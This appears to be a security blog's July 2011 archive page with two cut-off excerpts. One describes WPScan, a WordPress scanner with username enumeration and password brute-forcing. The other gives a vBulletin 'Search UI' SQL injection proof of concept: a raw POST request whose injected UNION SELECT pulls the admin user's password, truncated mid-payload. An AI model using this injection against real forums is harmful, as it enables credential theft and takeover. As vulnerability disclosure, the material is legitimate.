Monthly Archive: July 2011

WPScan – WordPress security scanner

WPScan is a security scanner which checks WordPress weaknesses using a black box method. The main features are, username enumeration, multithreaded password bruteforcing, WordPress Version enumeration and Plugin vulnerability enumeration. Download here | Source...


vBulletin "Search UI" SQL Injection 0-day – part II

vBulletin “Search UI” SQL Injection PoC: [cc lang=”html”]POST /search.php?do=process HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select...